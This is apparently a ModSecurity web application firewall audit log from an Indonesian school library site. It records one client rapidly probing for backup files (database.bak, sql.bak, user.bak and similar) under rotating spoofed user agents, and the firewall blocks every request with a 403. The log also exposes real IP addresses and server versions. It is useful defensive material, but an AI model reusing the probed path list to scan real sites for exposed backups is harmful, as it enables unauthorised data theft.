[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227018696 1912 (- - -) Stopwatch2: 1747683227018696 1912; combined=737, p1=341, p2=369, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d49910f-Z-- --e5dbb15c-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo3AAAAAw 103.236.140.4 33902 103.236.140.4 8181 --e5dbb15c-B-- GET /customers.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 OPR/54.0.2952.51 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182431 --e5dbb15c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e5dbb15c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227019062 1744 (- - -) Stopwatch2: 1747683227019062 1744; combined=680, p1=334, p2=307, p3=0, p4=0, p5=38, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5dbb15c-Z-- --d228b014-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo4AAAABA 103.236.140.4 33904 103.236.140.4 8181 --d228b014-B-- GET /com.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757626 --d228b014-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d228b014-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227024068 1590 (- - -) Stopwatch2: 1747683227024068 1590; combined=673, p1=357, p2=288, p3=0, p4=0, p5=27, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d228b014-Z-- --576f9933-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo4QAAAAA 103.236.140.4 33904 103.236.140.4 8181 --576f9933-B-- GET /wwwroot.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 OPR/56.0.3051.104 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757637 --576f9933-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --576f9933-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227030172 1682 (- - -) Stopwatch2: 1747683227030172 1682; combined=698, p1=338, p2=332, p3=0, p4=0, p5=28, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --576f9933-Z-- --d94b6918-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo4wAAABI 103.236.140.4 33756 103.236.140.4 8181 --d94b6918-B-- GET /backups.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3; rv:52.0.1) Gecko/20100101 Firefox/52.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167805001 --d94b6918-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d94b6918-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227031684 1808 (- - -) Stopwatch2: 1747683227031684 1808; combined=682, p1=307, p2=348, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d94b6918-Z-- --8bee766a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo5AAAAAs 103.236.140.4 33902 103.236.140.4 8181 --8bee766a-B-- GET /smkn22jakarta.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.5.3) Gecko/20100101 Firefox/52.5.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530767 --8bee766a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8bee766a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227033335 1596 (- - -) Stopwatch2: 1747683227033335 1596; combined=666, p1=316, p2=324, p3=0, p4=0, p5=26, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8bee766a-Z-- --18fc923e-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo5QAAABU 103.236.140.4 33902 103.236.140.4 8181 --18fc923e-B-- GET /media.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530770 --18fc923e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --18fc923e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227035512 1687 (- - -) Stopwatch2: 1747683227035512 1687; combined=708, p1=303, p2=377, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18fc923e-Z-- --2bd91a51-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo6AAAAAk 103.236.140.4 33756 103.236.140.4 8181 --2bd91a51-B-- GET /web.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:57.0.4) Gecko/20100101 Firefox/57.0.4 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530784 --2bd91a51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2bd91a51-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227042573 1547 (- - -) Stopwatch2: 1747683227042573 1547; combined=619, p1=313, p2=279, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bd91a51-Z-- --f4d1c370-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo7AAAAAM 103.236.140.4 33756 103.236.140.4 8181 --f4d1c370-B-- GET /smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1; rv:52.2.1) Gecko/20100101 Firefox/52.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227067 --f4d1c370-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f4d1c370-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227072455 1669 (- - -) Stopwatch2: 1747683227072455 1669; combined=662, p1=316, p2=320, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4d1c370-Z-- --fd608e47-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo7QAAABg 103.236.140.4 33756 103.236.140.4 8181 --fd608e47-B-- GET /engine.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227070 --fd608e47-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fd608e47-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227075547 1673 (- - -) Stopwatch2: 1747683227075547 1673; combined=691, p1=307, p2=352, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd608e47-Z-- --5d128f5d-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo7gAAAAg 103.236.140.4 33756 103.236.140.4 8181 --5d128f5d-B-- GET /localhost.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871812 --5d128f5d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5d128f5d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227078721 1506 (- - -) Stopwatch2: 1747683227078721 1506; combined=615, p1=301, p2=288, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d128f5d-Z-- --9b5b206d-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo8AAAAAU 103.236.140.4 33756 103.236.140.4 8181 --9b5b206d-B-- GET /archive.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227082 --9b5b206d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9b5b206d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227083270 2047 (- - -) Stopwatch2: 1747683227083270 2047; combined=795, p1=387, p2=374, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b5b206d-Z-- --c5ad2b6a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo8QAAABQ 103.236.140.4 33902 103.236.140.4 8181 --c5ad2b6a-B-- GET /sql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 OPR/56.0.3051.104 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871823 --c5ad2b6a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c5ad2b6a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227084441 1796 (- - -) Stopwatch2: 1747683227084441 1796; combined=724, p1=344, p2=352, p3=0, p4=0, p5=27, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5ad2b6a-Z-- --b054c229-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo8gAAABM 103.236.140.4 33902 103.236.140.4 8181 --b054c229-B-- GET /dat.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0.1) Gecko/20100101 Firefox/61.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167805040 --b054c229-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b054c229-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227092655 1524 (- - -) Stopwatch2: 1747683227092655 1524; combined=602, p1=304, p2=272, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b054c229-Z-- --4e65816a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo8wAAAAc 103.236.140.4 33902 103.236.140.4 8181 --4e65816a-B-- GET /tar.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227095 --4e65816a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4e65816a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227095786 1780 (- - -) Stopwatch2: 1747683227095786 1780; combined=654, p1=317, p2=304, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e65816a-Z-- --ae61951a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo9AAAABE 103.236.140.4 33756 103.236.140.4 8181 --ae61951a-B-- GET /user.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167805045 --ae61951a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ae61951a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227096839 1551 (- - -) Stopwatch2: 1747683227096839 1551; combined=606, p1=301, p2=279, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae61951a-Z-- --93eea568-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo9wAAAA8 103.236.140.4 33902 103.236.140.4 8181 --93eea568-B-- GET /database.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871832 --93eea568-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --93eea568-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
